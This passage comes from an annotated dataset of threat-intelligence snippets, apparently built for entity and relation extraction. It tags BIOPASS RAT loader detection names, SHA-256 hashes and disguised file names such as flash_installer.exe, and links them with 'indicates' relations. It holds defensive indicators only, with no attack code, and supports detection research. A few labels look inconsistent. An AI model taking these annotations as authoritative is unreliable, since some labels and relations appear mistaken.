","entities":[{"id":10230,"label":"malware","start_offset":0,"end_offset":11},{"id":10231,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49034,"label":"FILEPATH","start_offset":112,"end_offset":131},{"id":49033,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":578,"from_id":10230,"to_id":49033,"type":"duplicate-of"},{"id":579,"from_id":49034,"to_id":10231,"type":"duplicate-of"},{"id":580,"from_id":49034,"to_id":49033,"type":"indicates"},{"id":581,"from_id":10231,"to_id":49033,"type":"indicates"}],"Comments":[]} {"id":3384,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 3195c355aa564ea66b4b37baa9547cb53dde7cf4ae7010256db92fff0bde873d flash.exe","entities":[{"id":10232,"label":"malware","start_offset":0,"end_offset":11},{"id":10233,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49035,"label":"malware","start_offset":20,"end_offset":44},{"id":49036,"label":"FILEPATH","start_offset":112,"end_offset":121}],"relations":[{"id":582,"from_id":10232,"to_id":49035,"type":"duplicate-of"},{"id":583,"from_id":49036,"to_id":10233,"type":"duplicate-of"},{"id":584,"from_id":49036,"to_id":49035,"type":"indicates"},{"id":585,"from_id":10233,"to_id":49035,"type":"indicates"}],"Comments":[]} {"id":3385,"text":" BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 32a3934d96a8f2dae805fa28355cd0155c22ffad4545f9cd9c1ba1e9545b39ac","entities":[{"id":10234,"label":"malware","start_offset":1,"end_offset":12},{"id":10235,"label":"SHA2","start_offset":47,"end_offset":111},{"id":49037,"label":"malware","start_offset":21,"end_offset":45}],"relations":[{"id":586,"from_id":10234,"to_id":49037,"type":"duplicate-of"},{"id":587,"from_id":10235,"to_id":49037,"type":"indicates"}],"Comments":[]} {"id":3386,"text":"test.exe BIOPASS RAT Loader Backdoor.","entities":[{"id":10236,"label":"malware","start_offset":10,"end_offset":21},{"id":49038,"label":"FILEPATH","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} {"id":3387,"text":"Win32.BIOPASS.A","entities":[{"id":49039,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":3388,"text":" 32c1460ba5707783f1bbaedab5e5eab21d762094106d6af8fa6b2f0f0d777c1a","entities":[{"id":10237,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":3389,"text":"test3.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 344cdbc2a7e0908cb6638bc7b81b6b697b32755bad3bed09c511866eff3876c7","entities":[{"id":10238,"label":"malware","start_offset":11,"end_offset":22},{"id":10239,"label":"SHA2","start_offset":57,"end_offset":121},{"id":49041,"label":"malware","start_offset":31,"end_offset":55},{"id":49040,"label":"FILEPATH","start_offset":0,"end_offset":9}],"relations":[{"id":588,"from_id":49040,"to_id":49041,"type":"indicates"},{"id":589,"from_id":10238,"to_id":49041,"type":"duplicate-of"},{"id":590,"from_id":49040,"to_id":10239,"type":"duplicate-of"},{"id":591,"from_id":10239,"to_id":49041,"type":"indicates"}],"Comments":[]} {"id":3390,"text":"test4.exe BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A 3589e53c59d9807cca709387bbcaaffc7e24e15d9a78425b717fc55c779b928e","entities":[{"id":10240,"label":"malware","start_offset":11,"end_offset":22},{"id":10241,"label":"SHA2","start_offset":57,"end_offset":121},{"id":49042,"label":"FILEPATH","start_offset":0,"end_offset":9},{"id":49043,"label":"malware","start_offset":31,"end_offset":55}],"relations":[{"id":592,"from_id":49042,"to_id":49043,"type":"indicates"},{"id":593,"from_id":10241,"to_id":49043,"type":"indicates"},{"id":594,"from_id":10240,"to_id":49043,"type":"duplicate-of"},{"id":595,"from_id":49042,"to_id":10241,"type":"duplicate-of"}],"Comments":[]} {"id":3391,"text":"flash.exe ","entities":[{"id":49044,"label":"malware","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} {"id":3392,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 36e3fcd6a4c7c9db985be77ea6394b2ed019332fdae4739df2f96a541ea52617 Silverlight.exe","entities":[{"id":10242,"label":"malware","start_offset":0,"end_offset":11},{"id":10243,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49045,"label":"malware","start_offset":20,"end_offset":44},{"id":49046,"label":"FILEPATH","start_offset":112,"end_offset":127}],"relations":[{"id":596,"from_id":10242,"to_id":49045,"type":"duplicate-of"},{"id":597,"from_id":49046,"to_id":10243,"type":"duplicate-of"},{"id":598,"from_id":49046,"to_id":49045,"type":"indicates"},{"id":599,"from_id":10243,"to_id":49045,"type":"indicates"}],"Comments":[]} {"id":3393,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 3e8f8b8a5f70c195a2e4d4fc7f80523809f6dbf9ead061ce8ef04fb489a577cf test-flash.exe BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A 5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba flash_installer.exe ","entities":[{"id":10244,"label":"malware","start_offset":0,"end_offset":11},{"id":10246,"label":"malware","start_offset":128,"end_offset":139},{"id":10245,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10247,"label":"SHA2","start_offset":174,"end_offset":238},{"id":49048,"label":"malware","start_offset":20,"end_offset":44},{"id":49047,"label":"malware","start_offset":148,"end_offset":172},{"id":49050,"label":"FILEPATH","start_offset":240,"end_offset":259},{"id":49049,"label":"FILEPATH","start_offset":112,"end_offset":126}],"relations":[{"id":600,"from_id":10244,"to_id":49048,"type":"duplicate-of"},{"id":601,"from_id":10246,"to_id":49047,"type":"duplicate-of"},{"id":602,"from_id":49049,"to_id":10245,"type":"duplicate-of"},{"id":603,"from_id":49050,"to_id":10247,"type":"duplicate-of"},{"id":604,"from_id":10247,"to_id":49047,"type":"indicates"},{"id":605,"from_id":49050,"to_id":49047,"type":"indicates"},{"id":606,"from_id":49049,"to_id":49048,"type":"indicates"},{"id":607,"from_id":10245,"to_id":49048,"type":"indicates"}],"Comments":[]} {"id":3394,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 5fd2da648068f75a4a66b08d6d93793f735be62ae88085a79d839b6a0d6d859a flash1.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 660cef8210f823acb0b31d78fbce1d6f3f8c4f43231286f7ac69f75b2c42c020 flashplayerpp_install_cn.exe","entities":[{"id":10248,"label":"malware","start_offset":0,"end_offset":11},{"id":10249,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10250,"label":"malware","start_offset":124,"end_offset":135},{"id":10251,"label":"SHA2","start_offset":170,"end_offset":234},{"id":49052,"label":"malware","start_offset":144,"end_offset":168},{"id":49053,"label":"FILEPATH","start_offset":236,"end_offset":264},{"id":49054,"label":"FILEPATH","start_offset":112,"end_offset":122},{"id":49051,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":608,"from_id":10248,"to_id":49051,"type":"duplicate-of"},{"id":609,"from_id":10250,"to_id":49052,"type":"duplicate-of"},{"id":610,"from_id":49054,"to_id":10249,"type":"duplicate-of"},{"id":611,"from_id":49053,"to_id":10251,"type":"duplicate-of"},{"id":612,"from_id":10251,"to_id":49052,"type":"indicates"},{"id":613,"from_id":49053,"to_id":49052,"type":"indicates"},{"id":614,"from_id":49054,"to_id":49051,"type":"indicates"},{"id":615,"from_id":10249,"to_id":49051,"type":"indicates"}],"Comments":[]} {"id":3395,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 69d930050b2445937ec6a4f9887296928bf663f7a71132676be3f112e80fe275 test.exe ","entities":[{"id":10252,"label":"malware","start_offset":0,"end_offset":11},{"id":10253,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49056,"label":"FILEPATH","start_offset":112,"end_offset":120},{"id":49055,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":616,"from_id":49056,"to_id":10253,"type":"duplicate-of"},{"id":617,"from_id":10252,"to_id":49055,"type":"duplicate-of"},{"id":619,"from_id":10253,"to_id":49055,"type":"indicates"},{"id":618,"from_id":49056,"to_id":49055,"type":"indicates"}],"Comments":[]} {"id":3396,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 6a0976e5f9d07ff3d80fa2958976183758ba5fcdd4645e391614a347b4b8e64b f0b96efe2f714e7bddf76cc90a8b8c88_se.exe ","entities":[{"id":10254,"label":"malware","start_offset":0,"end_offset":11},{"id":10255,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10256,"label":"FILEPATH","start_offset":112,"end_offset":151},{"id":49057,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":620,"from_id":10254,"to_id":49057,"type":"duplicate-of"},{"id":621,"from_id":10256,"to_id":10255,"type":"duplicate-of"},{"id":622,"from_id":10256,"to_id":49057,"type":"indicates"},{"id":623,"from_id":10255,"to_id":49057,"type":"indicates"}],"Comments":[]} {"id":3397,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 6ee8f6a0c514a5bd25f7a32210f4b3fe878d9d417a7ebe07befc285131bae10e news.exe","entities":[{"id":10258,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10257,"label":"malware","start_offset":0,"end_offset":11},{"id":49059,"label":"FILEPATH","start_offset":112,"end_offset":120},{"id":49058,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":626,"from_id":49059,"to_id":49058,"type":"indicates"},{"id":627,"from_id":10258,"to_id":49058,"type":"indicates"},{"id":624,"from_id":10257,"to_id":49058,"type":"duplicate-of"},{"id":625,"from_id":49059,"to_id":10258,"type":"duplicate-of"}],"Comments":[]} {"id":3398,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 75e03f40a088903579a436c0d8e8bc3d0d71cf2942ad793cc948f36866a2e1ad silverlight_ins.exe ","entities":[{"id":10259,"label":"malware","start_offset":0,"end_offset":11},{"id":49060,"label":"malware","start_offset":20,"end_offset":44},{"id":10260,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49061,"label":"FILEPATH","start_offset":112,"end_offset":131}],"relations":[{"id":628,"from_id":49061,"to_id":10260,"type":"duplicate-of"},{"id":629,"from_id":10259,"to_id":49060,"type":"duplicate-of"},{"id":630,"from_id":10260,"to_id":49060,"type":"indicates"},{"id":631,"from_id":49061,"to_id":49060,"type":"indicates"}],"Comments":[]} {"id":3399,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 7d0d7d416db5bd7201420982987e213a129eef2314193e4558a24f3c9a91a38e flash_installer.exe ","entities":[{"id":10261,"label":"malware","start_offset":0,"end_offset":11},{"id":10262,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49062,"label":"malware","start_offset":20,"end_offset":44},{"id":49063,"label":"FILEPATH","start_offset":112,"end_offset":131}],"relations":[{"id":632,"from_id":49063,"to_id":49062,"type":"indicates"},{"id":633,"from_id":10262,"to_id":49062,"type":"indicates"},{"id":634,"from_id":10261,"to_id":49062,"type":"duplicate-of"},{"id":635,"from_id":10262,"to_id":49063,"type":"duplicate-of"}],"Comments":[]} {"id":3400,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0 Silverlight.exe","entities":[{"id":10263,"label":"malware","start_offset":0,"end_offset":11},{"id":10264,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49064,"label":"malware","start_offset":20,"end_offset":44},{"id":49065,"label":"FILEPATH","start_offset":112,"end_offset":127}],"relations":[{"id":636,"from_id":10263,"to_id":49064,"type":"duplicate-of"},{"id":637,"from_id":49065,"to_id":10264,"type":"duplicate-of"},{"id":638,"from_id":10264,"to_id":49064,"type":"indicates"},{"id":639,"from_id":49065,"to_id":49064,"type":"indicates"}],"Comments":[]} {"id":3401,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 8445c0189735766edf0e3d01b91f6f98563fef272ac5c92d3701a1174ad072dd Silverlight_ins.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 89c0b2036ce8d1d91f6d8b8171219aafcd6237c811770fa16edf922cedfecc54 MTYwOTI1MzEzNQ==.exe BIOPASS RAT Loader Backdoor.","entities":[{"id":10265,"label":"malware","start_offset":0,"end_offset":11},{"id":10266,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10267,"label":"malware","start_offset":133,"end_offset":144},{"id":10268,"label":"SHA2","start_offset":179,"end_offset":243},{"id":10269,"label":"malware","start_offset":267,"end_offset":278},{"id":49066,"label":"malware","start_offset":20,"end_offset":44},{"id":49067,"label":"FILEPATH","start_offset":112,"end_offset":131},{"id":49068,"label":"malware","start_offset":153,"end_offset":177},{"id":49069,"label":"FILEPATH","start_offset":245,"end_offset":265}],"relations":[{"id":640,"from_id":10265,"to_id":49066,"type":"duplicate-of"},{"id":641,"from_id":49067,"to_id":10266,"type":"duplicate-of"},{"id":642,"from_id":10267,"to_id":49068,"type":"duplicate-of"},{"id":643,"from_id":10269,"to_id":49068,"type":"duplicate-of"},{"id":644,"from_id":10268,"to_id":49069,"type":"duplicate-of"},{"id":645,"from_id":49067,"to_id":49066,"type":"indicates"},{"id":646,"from_id":10266,"to_id":49066,"type":"indicates"},{"id":647,"from_id":10268,"to_id":10269,"type":"indicates"},{"id":648,"from_id":49069,"to_id":10269,"type":"indicates"}],"Comments":[]} {"id":3402,"text":"Win64.BIOPASS.A","entities":[{"id":49070,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":3403,"text":" 8b5d4840bbdce0798950cd5584e3d4564581a7698bc6cfb2892c97b826129cec Silverlight_ins.exe","entities":[{"id":10270,"label":"SHA2","start_offset":1,"end_offset":65},{"id":49071,"label":"FILEPATH","start_offset":67,"end_offset":86}],"relations":[{"id":649,"from_id":10270,"to_id":49071,"type":"duplicate-of"}],"Comments":[]} {"id":3404,"text":"BIOPASS RAT Loader Backdoor.","entities":[{"id":10271,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":3405,"text":"Win64.BIOPASS.A","entities":[{"id":49072,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":3406,"text":" 932B45AB117960390324678B0696EF0E07D7F8DE1FA0B94C529F243610F1DCC9","entities":[{"id":10272,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":3407,"text":"flash_ins.exe ","entities":[{"id":49073,"label":"FILEPATH","start_offset":0,"end_offset":13}],"relations":[],"Comments":[]} {"id":3408,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 98a91356e0094c96d81bd27af407dd48c3c91aaf97da6794aeb303597a773749 Silverlight1.exe","entities":[{"id":10273,"label":"malware","start_offset":0,"end_offset":11},{"id":10274,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49074,"label":"malware","start_offset":20,"end_offset":44},{"id":49075,"label":"FILEPATH","start_offset":112,"end_offset":128}],"relations":[{"id":650,"from_id":10273,"to_id":49074,"type":"duplicate-of"},{"id":651,"from_id":49075,"to_id":10274,"type":"duplicate-of"},{"id":652,"from_id":49075,"to_id":49074,"type":"indicates"},{"id":653,"from_id":10274,"to_id":49074,"type":"indicates"}],"Comments":[]} {"id":3409,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 9eed9a2e0edf38f6354f4e57b3a6b9bed5b19263f54bcee19e66fc8af0c29e4e test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 9f34d28562e7e1e3721bbf679c58aa8f5898995ed999a641f26de120f3a42cf4 Silverlight1.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 9ff906ffcde32e4c6fb3ea4652e6d6326713a7fde8bb783b52f12a1f382f8798 test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A a7c4dac7176e291bd2aba860e1aa301fb5f7d880794f493f2dea0982e2b7eb31 test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A b48e01ff816f12125f9f4cfc9180d534c7c57ef4ee50c0ebbe445e88d4ade939 test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A b82bde3fe5ee900a76ac27b4869ed9aa0802c63bbd72b3bfb0f1abce6340cc6c Silverlight_ins.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A b9d0838be8952ebd4218c8f548ce94901f789ec1e32f5eaf46733f0c94c77999 Silverlight_ins.exe ","entities":[{"id":10275,"label":"malware","start_offset":0,"end_offset":11},{"id":10276,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10277,"label":"malware","start_offset":122,"end_offset":133},{"id":10279,"label":"malware","start_offset":252,"end_offset":263},{"id":10281,"label":"malware","start_offset":374,"end_offset":385},{"id":10282,"label":"SHA2","start_offset":420,"end_offset":484},{"id":10283,"label":"malware","start_offset":496,"end_offset":507},{"id":10284,"label":"SHA2","start_offset":542,"end_offset":606},{"id":10285,"label":"malware","start_offset":618,"end_offset":629},{"id":10286,"label":"SHA2","start_offset":664,"end_offset":728},{"id":10287,"label":"malware","start_offset":751,"end_offset":762},{"id":10288,"label":"SHA2","start_offset":797,"end_offset":861},{"id":10278,"label":"SHA2","start_offset":168,"end_offset":232},{"id":10280,"label":"SHA2","start_offset":298,"end_offset":362},{"id":49076,"label":"malware","start_offset":20,"end_offset":44},{"id":49078,"label":"FILEPATH","start_offset":234,"end_offset":250},{"id":49079,"label":"malware","start_offset":272,"end_offset":296},{"id":49081,"label":"malware","start_offset":394,"end_offset":418},{"id":49083,"label":"malware","start_offset":516,"end_offset":540},{"id":49087,"label":"malware","start_offset":771,"end_offset":795},{"id":49077,"label":"malware","start_offset":142,"end_offset":166},{"id":49080,"label":"FILEPATH","start_offset":364,"end_offset":372},{"id":49084,"label":"FILEPATH","start_offset":608,"end_offset":616},{"id":49086,"label":"FILEPATH","start_offset":730,"end_offset":749},{"id":49088,"label":"FILEPATH","start_offset":863,"end_offset":882},{"id":49089,"label":"FILEPATH","start_offset":112,"end_offset":120},{"id":49082,"label":"FILEPATH","start_offset":486,"end_offset":494},{"id":49085,"label":"malware","start_offset":638,"end_offset":662}],"relations":[{"id":654,"from_id":10275,"to_id":49076,"type":"duplicate-of"},{"id":655,"from_id":10277,"to_id":49077,"type":"duplicate-of"},{"id":656,"from_id":10279,"to_id":49079,"type":"duplicate-of"},{"id":657,"from_id":10281,"to_id":49081,"type":"duplicate-of"},{"id":658,"from_id":10283,"to_id":49083,"type":"duplicate-of"},{"id":659,"from_id":10285,"to_id":49085,"type":"duplicate-of"},{"id":660,"from_id":10287,"to_id":49087,"type":"duplicate-of"},{"id":661,"from_id":49088,"to_id":10288,"type":"duplicate-of"},{"id":662,"from_id":49086,"to_id":10286,"type":"duplicate-of"},{"id":663,"from_id":49084,"to_id":10284,"type":"duplicate-of"},{"id":664,"from_id":49082,"to_id":10282,"type":"duplicate-of"},{"id":665,"from_id":49080,"to_id":10280,"type":"duplicate-of"},{"id":666,"from_id":49078,"to_id":10278,"type":"duplicate-of"},{"id":667,"from_id":49089,"to_id":10276,"type":"duplicate-of"},{"id":668,"from_id":10276,"to_id":49076,"type":"indicates"},{"id":669,"from_id":49089,"to_id":49076,"type":"indicates"},{"id":670,"from_id":49078,"to_id":49077,"type":"indicates"},{"id":671,"from_id":10278,"to_id":49077,"type":"indicates"},{"id":672,"from_id":49080,"to_id":49079,"type":"indicates"},{"id":673,"from_id":10280,"to_id":49079,"type":"indicates"},{"id":674,"from_id":49082,"to_id":49081,"type":"indicates"},{"id":675,"from_id":10282,"to_id":49081,"type":"indicates"},{"id":676,"from_id":49084,"to_id":49083,"type":"indicates"},{"id":677,"from_id":10284,"to_id":49083,"type":"indicates"},{"id":678,"from_id":49086,"to_id":49085,"type":"indicates"},{"id":679,"from_id":10286,"to_id":49085,"type":"indicates"},{"id":680,"from_id":49088,"to_id":10287,"type":"indicates"}],"Comments":[]} {"id":3410,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A ba44c22a3224c3a201202b69d86df2a78f0cd1d4ac1119eb29cae33f09027a9a Silverlight2.exe","entities":[{"id":10289,"label":"malware","start_offset":0,"end_offset":11},{"id":10290,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49090,"label":"malware","start_offset":20,"end_offset":44},{"id":49091,"label":"FILEPATH","start_offset":112,"end_offset":128}],"relations":[{"id":681,"from_id":10289,"to_id":49090,"type":"duplicate-of"},{"id":682,"from_id":49091,"to_id":10290,"type":"duplicate-of"},{"id":683,"from_id":49091,"to_id":49090,"type":"indicates"},{"id":684,"from_id":10290,"to_id":49090,"type":"indicates"}],"Comments":[]} {"id":3411,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A bd8dc7e3909f6663c0fff653d7afbca2b89f2e9bc6f27adaab27f640ccf52975 Silverlight.exe ","entities":[{"id":10291,"label":"malware","start_offset":0,"end_offset":11},{"id":10292,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49092,"label":"malware","start_offset":20,"end_offset":44},{"id":49093,"label":"FILEPATH","start_offset":112,"end_offset":127}],"relations":[{"id":685,"from_id":10291,"to_id":49092,"type":"duplicate-of"},{"id":686,"from_id":49093,"to_id":10292,"type":"duplicate-of"},{"id":687,"from_id":49093,"to_id":49092,"type":"indicates"},{"id":688,"from_id":10292,"to_id":49092,"type":"indicates"}],"Comments":[]} {"id":3412,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A bf4f50979b7b29f2b6d192630b8d7b76adb9cb65157a1c70924a47bf519c4edd test.exe","entities":[{"id":10293,"label":"malware","start_offset":0,"end_offset":11},{"id":10294,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49094,"label":"malware","start_offset":20,"end_offset":44},{"id":49095,"label":"FILEPATH","start_offset":112,"end_offset":120}],"relations":[{"id":689,"from_id":10293,"to_id":49094,"type":"duplicate-of"},{"id":690,"from_id":49095,"to_id":10294,"type":"duplicate-of"},{"id":691,"from_id":49095,"to_id":49094,"type":"indicates"},{"id":692,"from_id":10294,"to_id":49094,"type":"indicates"}],"Comments":[]} {"id":3413,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A c11906210465045a54a5de1053ce0624308a8c7b342bb707a24e534ca662dc89 test-flash.exe BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A c3fa69e15a63b151f8d1dc3018284e153ad2eb672d54555eaeaac79396b64e3b test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A c47fabc47806961f908bed37d6b1bbbfd183d564a2d01b7cae87bd95c20ff8a5 flashplayerpp_install_cn.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A c8542bffc7a2074b8d84c4de5f18e3c8ced30b1f6edc13047ce99794b388285c flash2.exe BIOPASS RAT Loader Backdoor.","entities":[{"id":10295,"label":"malware","start_offset":0,"end_offset":11},{"id":10296,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10297,"label":"malware","start_offset":128,"end_offset":139},{"id":10298,"label":"SHA2","start_offset":174,"end_offset":238},{"id":10299,"label":"malware","start_offset":250,"end_offset":261},{"id":10300,"label":"SHA2","start_offset":296,"end_offset":360},{"id":10301,"label":"malware","start_offset":392,"end_offset":403},{"id":10303,"label":"malware","start_offset":516,"end_offset":527},{"id":10302,"label":"SHA2","start_offset":438,"end_offset":502},{"id":49098,"label":"FILEPATH","start_offset":112,"end_offset":126},{"id":49101,"label":"FILEPATH","start_offset":362,"end_offset":390},{"id":49102,"label":"malware","start_offset":412,"end_offset":436},{"id":49096,"label":"malware","start_offset":20,"end_offset":44},{"id":49097,"label":"malware","start_offset":148,"end_offset":172},{"id":49099,"label":"FILEPATH","start_offset":240,"end_offset":248},{"id":49100,"label":"malware","start_offset":270,"end_offset":294},{"id":49103,"label":"FILEPATH","start_offset":504,"end_offset":514}],"relations":[{"id":696,"from_id":10298,"to_id":49099,"type":"duplicate-of"},{"id":698,"from_id":49101,"to_id":10300,"type":"duplicate-of"},{"id":700,"from_id":49103,"to_id":10302,"type":"duplicate-of"},{"id":701,"from_id":10296,"to_id":49096,"type":"indicates"},{"id":702,"from_id":49098,"to_id":49096,"type":"indicates"},{"id":703,"from_id":10298,"to_id":49097,"type":"indicates"},{"id":704,"from_id":49099,"to_id":49097,"type":"indicates"},{"id":693,"from_id":10295,"to_id":49096,"type":"duplicate-of"},{"id":694,"from_id":49098,"to_id":10296,"type":"duplicate-of"},{"id":695,"from_id":10297,"to_id":49097,"type":"duplicate-of"},{"id":697,"from_id":10299,"to_id":49100,"type":"duplicate-of"},{"id":699,"from_id":10301,"to_id":49102,"type":"duplicate-of"},{"id":705,"from_id":49101,"to_id":49100,"type":"indicates"},{"id":706,"from_id":10300,"to_id":49100,"type":"indicates"},{"id":707,"from_id":10302,"to_id":49102,"type":"indicates"},{"id":708,"from_id":49103,"to_id":49102,"type":"indicates"}],"Comments":[]} {"id":3414,"text":"Win64.BIOPASS.A","entities":[{"id":49104,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":3415,"text":" cce6b17084a996e2373aaebbace944a17d3e3745e9d88efad4947840ae92fd55","entities":[{"id":10304,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":3416,"text":"Silverlight_ins.exe ","entities":[{"id":49105,"label":"FILEPATH","start_offset":0,"end_offset":19}],"relations":[],"Comments":[]} {"id":3417,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A d18d84d32a340d20ab07a36f9e4b959495ecd88d7b0e9799399fcc4e959f536b flash_installer.exe","entities":[{"id":10305,"label":"malware","start_offset":0,"end_offset":11},{"id":10306,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49106,"label":"malware","start_offset":20,"end_offset":44},{"id":49107,"label":"FILEPATH","start_offset":112,"end_offset":131}],"relations":[{"id":709,"from_id":10305,"to_id":49106,"type":"duplicate-of"},{"id":711,"from_id":10306,"to_id":49106,"type":"indicates"},{"id":710,"from_id":49107,"to_id":10306,"type":"duplicate-of"},{"id":712,"from_id":49107,"to_id":49106,"type":"indicates"}],"Comments":[]} {"id":3418,"text":"BIOPASS RAT Loader Backdoor.","entities":[{"id":10307,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":3419,"text":"Win64.BIOPASS.A","entities":[{"id":49108,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":3420,"text":" e4109875e84b3e9952ef362abc5b826c003b3d0b1b06d530832359906b0b8831","entities":[{"id":10308,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":3421,"text":" flash.exe BIOPASS RAT Loader","entities":[{"id":10309,"label":"malware","start_offset":12,"end_offset":23},{"id":49109,"label":"FILEPATH","start_offset":1,"end_offset":10}],"relations":[],"Comments":[]} {"id":3422,"text":" Backdoor.Win64.BIOPASS.A e52ea54cfe3afd93a53e368245c5630425e326291bf1b2599b75dbf8e75b7aeb flashplayer_install_cn.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A f1ad25b594a855a3c9af75c5da74b44d900f6fbb655033f9a98a956292011c8e Silverlight.exe","entities":[{"id":10311,"label":"malware","start_offset":121,"end_offset":132},{"id":10310,"label":"SHA2","start_offset":27,"end_offset":91},{"id":10312,"label":"SHA2","start_offset":167,"end_offset":231},{"id":49110,"label":"malware","start_offset":1,"end_offset":25},{"id":49111,"label":"malware","start_offset":141,"end_offset":165},{"id":49112,"label":"FILEPATH","start_offset":93,"end_offset":119},{"id":49113,"label":"FILEPATH","start_offset":233,"end_offset":248}],"relations":[{"id":716,"from_id":49113,"to_id":49111,"type":"indicates"},{"id":717,"from_id":10311,"to_id":49111,"type":"duplicate-of"},{"id":713,"from_id":49112,"to_id":10310,"type":"duplicate-of"},{"id":714,"from_id":49113,"to_id":10312,"type":"duplicate-of"},{"id":715,"from_id":10312,"to_id":49111,"type":"indicates"},{"id":718,"from_id":49112,"to_id":49110,"type":"indicates"},{"id":719,"from_id":10310,"to_id":49110,"type":"indicates"}],"Comments":[]} {"id":3423,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A fa1d70b6b5b1a5e478c7d9d840aae0cc23d80476d9eea884a73d1b7e3926a209 64.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A fa7fbca583b22d92ae6d832d90ee637cc6ac840203cd059c6582298beb955aee test.exe BIOPASS RAT Loader Backdoor.","entities":[{"id":10313,"label":"malware","start_offset":0,"end_offset":11},{"id":10315,"label":"malware","start_offset":120,"end_offset":131},{"id":10317,"label":"malware","start_offset":242,"end_offset":253},{"id":10314,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10316,"label":"SHA2","start_offset":166,"end_offset":230},{"id":49115,"label":"FILEPATH","start_offset":112,"end_offset":118},{"id":49116,"label":"malware","start_offset":140,"end_offset":164},{"id":49117,"label":"FILEPATH","start_offset":232,"end_offset":240},{"id":49114,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":720,"from_id":10313,"to_id":49114,"type":"duplicate-of"},{"id":723,"from_id":10317,"to_id":49116,"type":"duplicate-of"},{"id":728,"from_id":10316,"to_id":49116,"type":"indicates"},{"id":721,"from_id":49115,"to_id":10314,"type":"duplicate-of"},{"id":722,"from_id":49117,"to_id":10316,"type":"duplicate-of"},{"id":724,"from_id":10315,"to_id":49116,"type":"duplicate-of"},{"id":725,"from_id":10314,"to_id":49114,"type":"indicates"},{"id":726,"from_id":49115,"to_id":49114,"type":"indicates"},{"id":727,"from_id":49117,"to_id":49116,"type":"indicates"}],"Comments":[]} {"id":3424,"text":"Win64.BIOPASS.A","entities":[{"id":49118,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":3425,"text":" 